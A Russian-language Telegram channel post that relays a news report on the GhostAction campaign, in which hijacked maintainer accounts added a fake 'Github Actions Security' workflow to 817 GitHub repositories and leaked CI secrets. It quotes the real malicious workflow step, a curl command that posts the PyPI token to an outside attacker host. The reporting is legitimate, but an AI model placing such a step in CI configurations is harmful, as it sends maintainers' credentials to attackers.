TGViewer
Технологический Болт Генона Технологический Болт Генона @tech_b0lt_genona · 9.82K subscribers
Post #5663 3.19K
В ходе атаки GhostAction скомпрометировано 817 репозиториев на GitHub
https://www.opennet.ru/opennews/art.shtml?num=63831

Исследователи из компании GitGuardian выявили массовую атаку на пользователей GitHub, в ходе которой был получен контроль над 327 учётными записями и осуществлена подстановка вредоносного обработчика Github Action в 817 репозиториев. Атака привела к утечке 3325 секретов, используемых в системах непрерывной интеграции и передаваемых через переменные окружения, включая токены доступа к PyPI, GitHub, NPM, DockerHub и различным облачным хранилищам.

Вредоносный обработчик распространялся под именем "Github Actions Security" и включал в секции "run" команду "curl", отправляющую содержимое переменных окружения на внешний хост при запуске задач в окружении непрерывной интеграции. Вредоносный коммит добавлялся с учётных записей мэйнтейнеров проектов, которые, вероятно, до этого были взломаны или стали жертвой фишинга.

https://github.com/eru123/vue-skidd/commit/f650e79ee63fafd5c3d8e6139b38a3c4cf05a766

Атака выявлена после разбора аномальной активности, связанной с пакетом FastUUID, предоставляющим Python-обвязку над Rust-библиотекой UUID. Пакет FastUUID, для которого за последнюю неделю зафиксировано почти 1.2 миллиона загрузок, используется в качестве зависимости в популярном проекте LiteLLM, насчитывающем в PyPI более 5 миллионов загрузок в неделю. Анализ изменений в репозитории FastUUID показал, что 2 сентября мэйнтейнер проекта добавил коммит с новым обработчиком Github Action, в котором содержался код для отправки токена к репозиторию PyPI на внешний хост.

      - name: Github Actions Security
run: |
curl -s -X POST -d 'PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}' https://bold-dhawan.45-139-104-115.plesk.page


Проблему удалось выявить до того как злоумышленники воспользовались перехваченным токеном - публикации вредоносных изменений или модифицированных версий пакета в PyPI для FastUUID не зафиксировано. Похожие подстановки Github Action выявлены ещё в 816 репозиториях, владельцам которых, а также администрации PyPI, GitHub, NPM и DockerHub, направлены уведомления. По состоянию на вчерашний вечер [5 сентября] вредоносные коммиты были отменены примерно в 100 репозиториях.

Список коммитов по проектам (671 штука)
https://github.com/search?q=%22Add+Github+Actions+Security+workflow%22&type=commits

Оригинал
The GhostAction Campaign: 3,325 Secrets Stolen Through Compromised GitHub Workflows
https://blog.gitguardian.com/ghostaction-campaign-3-325-secrets-stolen/
  • 🤣 15
  • 👍 7
More from @tech_b0lt_genona
  1. Oct 8, 2026Рунет: чем централизованнее, тем уязвимее. Удар по дата‑центру Яндекса побудил многих «око…
  2. Oct 8, 2026Этот четверг необычный относительно четверговых проектов. Весёлые ребята подхватили идею А…
  3. Oct 8, 2026Продолжаем четверг! Слово автору @alurm --- Привет, читатели! 🙂 Меня зовут Алан, на GitHu…
  4. Oct 8, 2026🔥 Каскадный коллапс Рунета. Мрачные прогнозы воплотились. Первопричиной цифрового домино…
  5. Oct 8, 2026В России предложили разрешить размещать ЦОДы для ИИ за рубежом https://www.vesti.ru/ns/v-r…
  6. Oct 8, 2026Четверг, а значит время проектов от подписчиков! 🌝 Тем, кто пропустил, что такое четверго…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →